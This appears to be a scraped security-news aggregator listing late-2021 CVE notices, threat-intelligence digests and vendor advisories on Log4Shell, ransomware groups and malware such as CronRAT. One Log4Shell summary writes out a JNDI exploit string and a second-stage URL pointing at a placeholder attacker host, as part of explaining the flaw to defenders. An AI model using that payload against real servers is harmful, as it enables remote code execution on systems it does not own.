What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2021-12-16 13:45:46 | \'DarkWatchman\' RAT Shows Evolution in Fileless Malware (lien direct) | The new tool manipulates Windows Registry in unique ways to evade security detections and is likely being used by ransomware groups for initial network access. | Ransomware Malware Tool | ||
 |
2021-12-15 20:15:08 | CVE-2021-43806 (lien direct) | Tuleap is a Libre and Open Source tool for end to end traceability of application and system developments. In affected versions Tuleap does not sanitize properly user settings when constructing the SQL query to browse and search commits in the CVS repositories. A authenticated malicious user with read access to a CVS repository could execute arbitrary SQL queries. Tuleap instances without an active CVS repositories are not impacted. The following versions contain the fix: Tuleap Community Edition 13.2.99.155, Tuleap Enterprise Edition 13.1-7, and Tuleap Enterprise Edition 13.2-6. | Tool | ||
|
2021-12-15 20:15:08 | CVE-2021-41276 (lien direct) | Tuleap is a Libre and Open Source tool for end to end traceability of application and system developments. In affected versions Tuleap does not sanitize properly the search filter built from the ldap_id attribute of a user during the daily synchronization. A malicious user could force accounts to be suspended or take over another account by forcing the update of the ldap_uid attribute. Note that the malicious user either need to have site administrator capability on the Tuleap instance or be an LDAP operator with the capability to create/modify account. The Tuleap instance needs to have the LDAP plugin activated and enabled for this issue to be exploitable. This issue has been patched in Tuleap Community Edition 13.2.99.31, Tuleap Enterprise Edition 13.1-5, and Tuleap Enterprise Edition 13.2-3. | Tool | ||
|
2021-12-15 20:15:08 | CVE-2021-43782 (lien direct) | Tuleap is a Libre and Open Source tool for end to end traceability of application and system developments. This is a follow up to GHSA-887w-pv2r-x8pm/CVE-2021-41276, the initial fix was incomplete. Tuleap does not sanitize properly the search filter built from the ldap_id attribute of a user during the daily synchronization. A malicious user could force accounts to be suspended or take over another account by forcing the update of the ldap_uid attribute. Note that the malicious user either need to have site administrator capability on the Tuleap instance or be an LDAP operator with the capability to create/modify account. The Tuleap instance needs to have the LDAP plugin activated and enabled for this issue to be exploitable. The following versions contain the fix: Tuleap Community Edition 13.2.99.83, Tuleap Enterprise Edition 13.1-6, and Tuleap Enterprise Edition 13.2-4. | Tool | ||
 |
2021-12-15 16:00:00 | Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache, Botnets, China, Espionage, Java, Russia, USB, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit
(published: December 10, 2021)
A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.
Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498
Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file
Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers
(published: December 8, 2021)
Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1 |
Malware Tool Vulnerability Threat Cloud | APT 37 APT 29 APT 15 APT 15 APT 25 | |
 |
2021-12-15 14:26:00 | Industry Reactions to Log4Shell Vulnerability (lien direct) | The widely used Log4j logging tool is affected by a critical remote code execution vulnerability that has been increasingly exploited by malicious actors, including profit-driven cybercriminals and state-sponsored groups. | Tool Vulnerability | ||
 |
2021-12-15 14:00:00 | Shoreline.io launches online notebooks for site reliability engineers (lien direct) | This automated remediation tool creates online versions of runbooks and can record debug sessions to capture best practices. | Tool | ||
|
2021-12-15 11:47:36 | Problematic Log4j Functionality Disabled as More Security Issues Come to Light (lien direct) | Developers of the widely used Apache Log4j Java-based logging tool have disabled problematic functionality as more security issues have come to light. | Tool | ||
|
2021-12-15 09:40:31 | Web Browsing Security Firm Guardio Raises $47 Million (lien direct) | Web browsing protection tool Guardio on Tuesday announced that it came out of bootstrap mode with $47 million in funding. Guardio's first ever investment round was led by Tiger Global. Cerca Partners, Emerge, Samsung Next, Union, and Vintage also participated. | Tool | ||
|
2021-12-14 14:11:35 | Log4Shell Tools and Resources for Defenders - Continuously Updated (lien direct) | 
The widely used Apache Log4j Java-based logging tool is affected by a critical remote code execution vulnerability that has been increasingly exploited by malicious actors, including to deliver various types of malware.
|
Tool Vulnerability | ||
 |
2021-12-13 09:00:42 | Apache Log4J Remote Code Execution Vulnerability (CVE-2021-44228) (lien direct) | FortiGuard Labs is aware of a remote code execution vulnerability in Apache Log4j. Log4j is a Java based logging audit framework within Apache. Apache Log4j2 2.14.1 and below are susceptible to a remote code execution vulnerability where a remote attacker can leverage this vulnerability to take full control of a vulnerable machine.This vulnerability is also known as Log4shell and has the CVE assignment (CVE-2021-44228). FortiGuard Labs will be monitoring this issue for any further developments.What are the Technical Details?Apache Log4j2 versions 2.14.1 and below Java Naming and Directory Interface (JNDI) features do not protect against attacker controlled LDAP and other JNDI related endpoints. A remote code execution vulnerability exists where attacker controlled log messages or log message parameters are able to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.What Versions of Software are Affected?Apache Log4J versions 2.0-beta9 to 2.14.1 are affected.Is there a Patch or Security Update Available?Yes, moving to version 2.15.0 mitigates this issue. Further mitigation steps are available from Apache as well. Please refer to the "Apache Log4j Security Vulnerabilities" in the APPENDIX for details.What is the CVSS Score?10 (CRITICAL)What is Exactly Apache Log4j?According to Apache:Log4j is a tool to help the programmer output log statements to a variety of output targets. In case of problems with an application, it is helpful to enable logging so that the problem can be located. With log4j it is possible to enable logging at runtime without modifying the application binary. The log4j package is designed so that log statements can remain in shipped code without incurring a high performance cost. It follows that the speed of logging (or rather not logging) is capital.At the same time, log output can be so voluminous that it quickly becomes overwhelming. One of the distinctive features of log4j is the notion of hierarchical loggers. Using loggers it is possible to selectively control which log statements are output at arbitrary granularity.What is the Status of Protections?FortiGuard Labs has IPS coverage in place for this issue as (version 19.215):Apache.Log4j.Error.Log.Remote.Code.ExecutionWhile we urge customers to patch vulnerable systems as soon as possible, FortiEDR monitors and protects against payloads delivered by exploitation of the vulnerability. The picture below demonstrates blocking of a PowerShell payload used as part of CVE-2021-44228 exploitation:Detection of exploitable systems is possible via FortiEDR threat hunting by searching for loading of vulnerable log4j versions. This is an example of loading a vulnerable log4j library by a Apache Tomcat Server:Any Suggested Mitigation?According to Apache, the specific following mitigation steps are available:In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to "true." For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.classFortiGuard Labs recommends organizations affected by CVE-2021-44228 to update to the latest version of 2.15.0 immediately. Apache also recommends that users running versions 1.0 or lower install version 2.0 or higher as 1.0 has reached end of life in August 2015 for Log4j to obtain security updates. Binary patches are never provided and must be compiled. For further details, refer to the "Apache Log4j Security Vulnerabilities" in the APPENDIX.If this is not possible, various counter measures such as isolating machines behind a firewall or VPN that are public facing is recommended. | Tool Vulnerability Threat | ★★★★★ | |
 |
2021-12-12 05:28:18 | Microsoft\'s Response to CVE-2021-44228 Apache Log4j 2 (lien direct) | Published on: 2021 Dec 11 SUMMARY Microsoft is investigating the remote code execution vulnerability (CVE-2021-44228) related to Apache Log4j (a logging tool used in many Java-based applications) disclosed on 9 Dec 2021. As we and the industry at large continue to gain a deeper understanding of the impact of this threat, we will publish technical … Microsoft's Response to CVE-2021-44228 Apache Log4j 2 Read More » | Tool Vulnerability | ||
|
2021-12-10 21:15:09 | CVE-2021-43815 (lien direct) | Grafana is an open-source platform for monitoring and observability. Grafana prior to versions 8.3.2 and 7.5.12 has a directory traversal for arbitrary .csv files. It only affects instances that have the developer testing tool called TestData DB data source enabled and configured. The vulnerability is limited in scope, and only allows access to files with the extension .csv to authenticated users only. Grafana Cloud instances have not been affected by the vulnerability. Versions 8.3.2 and 7.5.12 contain a patch for this issue. There is a workaround available for users who cannot upgrade. Running a reverse proxy in front of Grafana that normalizes the PATH of the request will mitigate the vulnerability. The proxy will have to also be able to handle url encoded paths. | Tool Vulnerability | ||
|
2021-12-10 17:58:04 | Zero Day in Ubiquitous Apache Log4j Tool Under Active Attack (lien direct) | The Log4Shell vulnerability critically threatens anybody using the popular open-source Apache Struts framework and could lead to a “Mini internet meltdown soonish.” | Tool Vulnerability Guideline | ||
|
2021-12-10 14:00:57 | Fujitsu Retires Tool Targeted by Threat Actors (lien direct) | Japanese tech giant Fujitsu has announced plans to retire the ProjectWEB project information sharing tool after it was targeted by threat actors earlier this year. Designed to aid collaboration between teams, ProjectWEB is a tool that organizations can employ to share project data both within and outside of their environments. | Tool Threat | ||
 |
2021-12-09 07:47:15 | Fujitsu pins Japanese govt data breach on stolen ProjectWEB accounts (lien direct) | Fujitsu says the attackers behind the May data breach used a vulnerability in the company's ProjectWEB information-sharing tool to steal accounts from legitimate users and access proprietary data belonging to multiple Japanese government agencies. [...] | Data Breach Tool Vulnerability | ||
|
2021-12-08 17:17:19 | Amazon is shutting down web ranking site Alexa.com (lien direct) | Amazon announced on Wednesday plans to shut down its global website ranking system and competitor analysis tool "Alexa.com", which has been available for 25 years. [...] | Tool | ||
|
2021-12-07 16:04:00 | Anomali Cyber Watch: Nginx Trojans, BlackByte Ransomware, Android Malware Campaigns, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Ransomware, Maldocs, E-Commerce, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
New Malware Hides as Legit Nginx Process on E-Commerce Servers
(published: December 2, 2021)
Researchers at Sansec discovered NginRAT, a new malware variant that has been found on servers in the US, Germany, and France. Put in place to intercept credit card payments, this malware impersonates legitimate nginx processes which makes it very difficult to detect. NginRAT has shown up on systems that were previously infected with CronRAT, a trojan that schedules processes to run on invalid calendar days. This is used as a persistence technique to ensure that even if a malicious process is killed, the malware has a way to re-infect the system.
Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioural analysis defenses and social engineering training. Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network. Therefore, it will be easier to spot unusual traffic and connections to and from your network to potentially identify malicious activity.
MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Shared Modules - T1129
Tags: NginRAT, CronRAT, Nginx, North America, EU
How Phishing Kits Are Enabling A New Legion Of Pro Phishers
(published: December 2, 2021)
Phishing kits, such as XBALTI are seeing increased use against financial institutions. Mixing email with SMS messages, attackers are targeting companies such as Charles Schwab, J.P. Morgan Chase, RBC Royal Bank and Wells Fargo. Victims are targeted and asked to verify account details. The attack is made to appear legitimate by redirecting to the real sites after information has been harvested.
Analyst Comment: With financial transactions increasing around this time of year, it is likely financially themed malspam and phishing emails will be a commonly used tactic. Therefore, it is crucial that your employees are aware of their financial institution's policies regarding electronic communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document in a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Said emails should be properly avoided and reported to the appropriate personnel.
Tags: Phishing, XBATLI
Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors
(pub |
Ransomware Malware Tool Vulnerability Threat Cloud | APT 37 | ★★★★ |
|
2021-12-07 15:29:29 | How to mirror your Android device on Linux, macOS and Windows (lien direct) | Looking for a way to interact with your Android device on your desktop or laptop? If so, Jack Wallen has just the tool for you. | Tool | ||
|
2021-12-06 18:15:08 | CVE-2021-43784 (lien direct) | runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc, netlink is used internally as a serialization system for specifying the relevant container configuration to the `C` portion of the code (responsible for the based namespace setup of containers). In all versions of runc prior to 1.0.3, the encoder did not handle the possibility of an integer overflow in the 16-bit length field for the byte array attribute type, meaning that a large enough malicious byte array attribute could result in the length overflowing and the attribute contents being parsed as netlink messages for container configuration. This vulnerability requires the attacker to have some control over the configuration of the container and would allow the attacker to bypass the namespace restrictions of the container by simply adding their own netlink payload which disables all namespaces. The main users impacted are those who allow untrusted images with untrusted configurations to run on their machines (such as with shared cloud infrastructure). runc version 1.0.3 contains a fix for this bug. As a workaround, one may try disallowing untrusted namespace paths from your container. It should be noted that untrusted namespace paths would allow the attacker to disable namespace protections entirely even in the absence of this bug. | Tool Vulnerability | ||
|
2021-12-06 14:02:15 | Web Browsers Vulnerable to 14 New Types of XS-Leak Attacks (lien direct) | Researchers from two universities in Germany have developed a tool that can be used to check web browsers for cross-site leaks, and they claim to have identified 14 new attack classes. | Tool | ||
|
2021-12-02 14:48:08 | Yanluowang Ransomware Used By a Threat Actor Previously Linked to Thieflock Ransomware (lien direct) | FortiGuard Labs is aware of a report that Yanluowang ransomware was recently used by a threat actor who previously employed Thieflock ransomware. According to Symantec, the threat actor focuses on organizations across multiple sectors in the United States. Yanluowang ransomware was first reported in October 2021. Yanluowang attackers demand ransomware from the victims and tell them not to contact law enforcement or ransomware negotiation firms. If they do, the attackers threaten the victim with distributed denial of service (DDoS) attacks as well as making phone calls to alert the victim's business partners. Why is this Significant? This is significant because the attacker, who mainly targets U.S. corporations, appears to have switched their arsenal from Thieflock ransomware to Yanluowang ransomware. Because of this, companies in the United States need to pay extra attention to the tools, tactics, and procedure (TTPs) that this attacker uses. What TTPs is the Attacker Known to Use?According to the report, the attacker uses the following tools:GrabFF: A tool to dump passwords from FirefoxGrabChrome: A tool to dump passwords from ChromeBrowserPassView: A tool to dump passwords from Web browsers such as Internet Explorer, Chrome, Safari, Firefox, and OperaKeeThief: A PowerShell script to copy the master key from KeePassCustomized versions of Secretsdump: Security Account Manager (SAM) credential-dumping toolsFileGrab: A tool to capture newly created files in Windows file systemsCobalt Strike Beacon: A tool that allows the attacker to perform command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement.ProxifierPE: A tool to proxy connections back to attacker's Command and Control server (C&C)ConnectWise: A remote desktop software that provides remote access to the attackerAdFind: A command-line Active Directory query toolSoftPerfect Network Scanner: A tool to discover hostnames and network servicesBazarLoader: A backdoor program that is used to deploy additional malware and steal confidential information from the compromised machine. The attacker typically downloads BazarLoader using PowerShell.The initial attack vector is unclear so suspicious emails must be handled with caution and the patches for products and software that are used in the company must be applied.What is Yanluowang Ransomware? Yanluowang ransomware is reported to perform the following actions:Terminates all hypervisor virtual machines (VMs) running on the compromised machineTerminates processes, such as SQL and back-up solution Veeam, that are listed in processes.txtEncrypts files on the victim's machine and appends the .yanluowang extension to themDrops a ransom noteIn the ransom note, Yanluowang attacker asks the victim to follow their rules including not to contact law enforcement or ransomware negotiation companies or else the attacker will launch distributed denial of service (DDoS) attacks against the victim and will make phone calls to the victim's employees and business partners. What is the Status of Protection?FortiGuard Labs provides the following AV coverage against Yanluowang ransomware:W32/Ylwransom.A!tr.ransom All network IOCs are blocked by the WebFiltering client. | Ransomware Malware Tool Threat | ★★ | |
|
2021-12-01 19:24:30 | Cybersecurity: Increase your protection by using the open-source tool YARA (lien direct) | This won't replace antivirus software, but it can help you detect problems much more efficiently and allows more customization. Here's how to install it on Mac, Windows and Linux. | Tool | ||
|
2021-12-01 16:15:07 | CVE-2021-26334 (lien direct) | The AMDPowerProfiler.sys driver of AMD ?Prof tool may allow lower privileged users to access MSRs in kernel which may lead to privilege escalation and ring-0 code execution by the lower privileged user. | Tool Guideline | ||
|
2021-11-30 20:59:00 | What is a scrum, and why should your teams use it? (lien direct) | Scrum is an incredibly important tool for agile businesses. Jack Wallen explains what it is and why you should employ it. | Tool | ||
|
2021-11-30 17:09:00 | Anomali Cyber Watch: Web Skimmers Victimize Holiday Shoppers, Tardigrade Targets Vaccine Manufacturers, Babadeda Crypter Targets Crypto Community, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Data breach, Stealthy malware, Vulnerabilities and Web skimmers. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Micropatching Unpatched Local Privilege Escalation in Mobile Device Management Service (CVE-2021-24084 / 0day)
(published: November 26, 2021)
0patch Team released free, unofficial patches to protect Windows 10 users from a local privilege escalation (LPE) zero-day vulnerability in the Mobile Device Management Service. The security flaw resides under the "Access work or school" settings, and it bypasses a patch released by Microsoft in February to address an information disclosure vulnerability tracked as CVE-2021-24084. Security researcher Abdelhamid Naceri discovered this month that the incompletely-patched flaw could also be exploited to gain admin privileges after publicly disclosing the newly-spotted bug in June. He also published a proof of concept (POC) for a related vulnerability in Windows 11.
Analyst Comment: Check if your Windows 10 version is affected and if so, apply the appropriate free micropatches. Plan to patch your Windows 11 systems when security patches become available. As actors now have a POC for the Windows 11 privilege escalation vulnerability, it is important to harden your systems to avoid the initial access.
MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Privilege Escalation - T1068
Tags: CVE-2021-24084, Vulnerability, Micropatching, Privilege escalation, LPE, Administrative access, Zero-day, Windows, Windows 10, Windows 11
CronRAT Malware Hides Behind February 31st
(published: November 24, 2021)
Sansec researchers have discovered CronRAT, a new remote access trojan (RAT), that is capable of stealing payment details by going after vulnerable web stores and dropping payment skimmers on Linux servers. By modifying the server-side code it bypasses browser-based security solutions. CronRAT actors engage in Magecart attacks achieving additional stealthiness thanks to the Linux Cron Job system. CronRAT code is compressed, Base64-encoded and hidden in the task names in the calendar subsystem of Linux servers (“cron”). To avoid system administrators’ attention and execution errors, those tasks are scheduled on a nonexistent day (such as February 31st). Other CronRAT stealthiness techniques are: anti-tampering checksums, being controlled via binary/obfuscated protocol, control server disguised as Dropbear SSH service, fileless execution, launching tandem RAT in a separate Linux subsystem, and timing modulation.
Analyst Comment: Websites, much like personal workstations, require constant maintenance and upkeep in order to adapt to the latest threats. All external facing assets should be monitored and scanned for vulnerabilities. Threats like CronRAT make it critical that server software is kept up to date. The ability to easily restore from backup, incident response planning, and customer communication channels should all be established before a breach occurs. In addition, supply chain attacks are becoming more frequent amongst threat actors as their Tactics, Techniques, and Procedures (TTPs) evolve. Therefore, it is par |
Ransomware Malware Tool Vulnerability Threat | ||
 |
2021-11-29 14:00:23 | 7 Ways an Incident Response Retainer Can Increase Security Resilience (lien direct) | An Incident response retainer can be a powerful tool for mitigating cyber risk and helping organizations respond quickly in the event of a breach. | Tool | ||
|
2021-11-23 20:30:00 | Anomali Cyber Watch: APT, Emotet, Iran, RedCurl and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Data breach, Data leak, Malspam, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Emotet malware is back and rebuilding its botnet via TrickBot
(published: November 15, 2021)
After Europol enforcement executed a takeover of the Emotet infrastructure in April 2021 and German law enforcement used this infrastructure to load a module triggering an uninstall of existing Emotet installs, new Emotet installs have been detected via initial infections with TrickBot. These campaigns and infrastructure appear to be rapidly proliferating. Once infected with Emotet, in addition to leveraging the infected device to send malspam, additional malware can be downloaded and installed on the victim device for various purposes, including ransomware. Researchers currently have not seen any spamming activity or any known malicious documents dropping Emotet malware besides from TrickBot. It is possible that Emotet is using Trickbot to rebuild its infrastructure and steal email chains it will use in future spam attacks.
Analyst Comment: Phishing continues to be a preferred method for initial infection by many actors and malware families. End users should be cautious with email attachments and links, and organizations should have robust endpoint protections that are regularly updated.
***For Anomali ThreatStream Customers***
To assist in helping the community, especially with the online shopping season upon us, Anomali Threat Research has made available two, threat actor-focused dashboards: Mummy Spider and Wizard Spider, for Anomali ThreatStream customers. The Dashboards are preconfigured to provide immediate access and visibility into all known Mummy Spider and Wizard Spider indicators of compromise (IOCs) made available through commercial and open-source threat feeds that users manage on ThreatStream.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Shared Modules - T1129 | [MITRE ATT&CK] Data Encrypted - T1022 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Automated Collection - T1119
Tags: Emotet, Trickbot, phishing, ransomware
Wind Turbine Giant Offline After Cyber Incident
(published: November 22, 2021)
The internal IT systems for Vestas Wind Systems, the world's largest manufacturer of wind turbines, have been hit by an attack. This attack does not appear to have affected their manufacturing or supply chain, and recovery of affected systems is underway, although a number of systems remain off as a precaution. The company has announced that some data has been compromised. The investigation of this incident is ongoing, but may have been a ransomware attack. The incidents of ransomware across the globe increased by near |
Ransomware Spam Malware Tool Vulnerability Threat Patching | ||
|
2021-11-22 16:15:08 | CVE-2021-43558 (lien direct) | A flaw was found in Moodle in versions 3.11 to 3.11.3, 3.10 to 3.10.7, 3.9 to 3.9.10 and earlier unsupported versions. A URL parameter in the filetype site administrator tool required extra sanitizing to prevent a reflected XSS risk. | Tool | ||
|
2021-11-22 14:59:00 | Scrum or kanban: Which agile software development tool is best for your project? (lien direct) | Project management is key to an efficient and agile development cycle. But when faced with choosing either kanban or scrum, which route do you take? Jack Wallen has some advice. | Tool | ||
|
2021-11-19 19:15:08 | CVE-2021-40391 (lien direct) | An out-of-bounds write vulnerability exists in the drill format T-code tool number functionality of Gerbv 2.7.0, dev (commit b5f1eacd), and the forked version of Gerbv (commit 71493260). A specially-crafted drill file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability. | Tool Vulnerability Guideline | ||
|
2021-11-19 10:21:31 | Memento Group Exploited CVE-2021-21972, Hid Five Months to Deploy Ransomware (lien direct) | FortiGuard Labs is aware of a report that a new adversary carried out an attack using a Python-based ransomware called "Memento." The Memento attackers are reported to have taken advantage of a remote code execution vulnerability in a VMWare vCenter Server plugin (CVE-2021-21972) as a initial attack vector. The group started to exploit the vulnerability in April, then stayed in the network until they deployed ransomware to the victim's network upon completion of their data exfiltration. Why is this Significant?This is significant because the attacker was able to stay in the victim's network for more than 5 months after they gained initial access to the network by exploiting CVE-2021-21972. Because of the severity of the vulnerability, CISA released an alert on February 24th, 2021 to urge admins to apply the patch as soon as possible. What is CVE-2021-21972?CVE-2021-21972 is a remote code execution vulnerability in a VMWare vCenter Server plugin. This vulnerability is due to improper handling of the request parameters in the vulnerable application. A remote attacker could exploit this vulnerability by uploading a specially crafted file to the targeted server. Successful exploitation of this vulnerability could lead to arbitrary code execution on the affected system. CVE-2021-21972 has a CVSS (Common Vulnerability Scoring System) score of 9.8 and affects the following products:vCenter Server 7.0 prior to 7.0 U1cvCenter Server 6.7 prior to 6.7 U3lvCenter Server 6.5 prior to 6.5 U3n For more details, see the Appendix for a link to the VMware advisory "VMSA-2021-0002". Has the Vendor Released a Patch for CVE-2021-21972?Yes, VMWare released a patch for CVE-2021-21972 in February 2021. What's the Details of the Attack Carried Out by Memento Group?According to security vendor Sophos, the attacker gained access to the victim's network in April 2021 by exploiting the vulnerability CVE-2021-21972. In May, the attacker deployed the wmiexec remote shell tool and the secretsdump hash dumping tool to a Windows server. Wmiexec is a tool that allows the attacker to remotely execute commands through WMI (Windows Management Instrumentation). Secretsdump is a tool that allows the attacker to extract credential material from the Security Account Manager (SAM) database. The attacker then downloaded a command-line version of the WinRAR and two RAR archives containing various hacking tools used for reconnaissance and credential theft to the compromised server. After that, the adversary used RDP (Remote Desktop Protocol) over SSH to further spread within the network. In late October, after successfully staying low for 5 months, the attacker collected files from the compromised machines and put them in an archive file using WinRAR for data exfiltration. Then the attacker deployed the initial variant of the Memento ransomware to the victim's network, but the file encryption process was blocked due to the anti-ransomware protection. The attack then switched its ransom tactic by putting the victim's files into password-protected archive files instead of encrypting them. What is Memento Ransomware?Memento is a Python-based ransomware used by the Memento group. The first Memento variant simply encrypts files in the compromised machine. The second variant does not involve file encryption. It collects files from the compromised machine and puts them into password-protected files. What is the Status of Coverage?FortiGuard Labs provides the following AV coverage for the available samples used in the attack:W32/KeyLogger.EH!tr.spyPossibleThreat.PALLASNET.HRiskware/MinerRiskware/ImpacketRiskware/MimikatzRiskware/Secretdmp FortiGuard Labs provides the following IPS coverage for CVE-2021-21972?VMware.vCenter.vROps.Directory.Traversal Other Workaround? VMWare provided workaround for CVE-2021-21972. See Appendix for a link to "Workaround Instructions for CVE-2021-21972 and CVE-2021-21973 on VMware vCenter Server (82374)". | Ransomware Tool Vulnerability Guideline | ||
|
2021-11-18 14:00:50 | Spear-Phishing Campaign Exploits Glitch Platform to Steal Credentials (lien direct) | Threat actors are targeting Middle-East-based employees of major corporations in a scam that uses a specific 'ephemeral' aspect of the project-management tool to link to SharePoint phishing pages. | Tool Threat | ||
 |
2021-11-18 12:00:00 | Présentation du cadre de criminalistique numérique et de réponse aux incidents de Mandiant \\ pour les systèmes OT intégrés Introducing Mandiant\\'s Digital Forensics and Incident Response Framework for Embedded OT Systems (lien direct) |
La collecte et l'analyse des données médico-légales sont un composant central du processus de réponse de l'incident.Ce processus est central pour déterminer l'existence et la portée subséquente d'un compromis, les outils utilisés par les adversaires et leurs capacités.Cependant, l'obtention des données de criminalistique numérique et de réponse aux incidents (DFIR) n'est pas toujours une tâche simple, en particulier lorsque des systèmes de technologie opérationnelle (OT) sont impliqués.
Les réseaux OT comprennent souvent une variété de produits peu communs et parfois obscurs qui exploitent régulièrement des composants logiciels et de micrologiciels embarqués.Un bon exemple de ceci est en temps réel
Collecting and analyzing forensic data is a core component of the incident response process. This process is central to determining the existence, and subsequent scope of a compromise, the tools used by adversaries, and their capabilities. However, obtaining digital forensics and incident response (DFIR) data is not always a simple task, especially when operational technology (OT) systems are involved. OT networks often include a variety of uncommon and sometimes obscure products that regularly leverage embedded software and firmware components. A good example of this is real-time |
Tool Industrial | ★★★ | |
 |
2021-11-17 20:46:21 | New firefighting tool delivers water directly to blazing EV batteries (lien direct) | Technique uses less water to bring battery temps down to normal. | Tool | ||
|
2021-11-17 19:15:08 | CVE-2021-0096 (lien direct) | Improper authentication in the software installer for the Intel(R) NUC HDMI Firmware Update Tool for NUC7i3DN, NUC7i5DN, NUC7i7DN before version 1.78.1.1 may allow an authenticated user to potentially enable escalation of privilege via local access. | Tool | ||
|
2021-11-17 19:15:08 | CVE-2021-33090 (lien direct) | Incorrect default permissionsin the software installer for the Intel(R) NUC HDMI Firmware Update Tool for NUC10i3FN, NUC10i5FN, NUC10i7FN before version 1.78.2.0.7 may allow an authenticated user to potentially enable escalation of privilege via local access. | Tool | ||
|
2021-11-17 19:15:08 | CVE-2021-33089 (lien direct) | Improper access control in the software installer for the Intel(R) NUC HDMI Firmware Update Tool for NUC8i3BE, NUC8i5BE, NUC8i7BE before version 1.78.4.0.4 may allow an authenticated user to potentially enable escalation of privilege via local access. | Tool | ||
|
2021-11-16 20:48:00 | macOS Monterey includes an absolute gem of a feature for those looking to up their efficiency game (lien direct) | With macOS Monterey comes a tool that can help you create user friendly, repeatable actions to help optimize your daily life in numerous ways. | Tool | ||
|
2021-11-16 17:34:00 | Anomali Cyber Watch: REvil Affiliates Arrested, Electronics Retail Giant Hit By Ransomware, Robinhood Breach, Zero Day In Palo Alto Security Appliance and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Data breach, Data leak, Malspam, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer
(published: November 8, 2021)
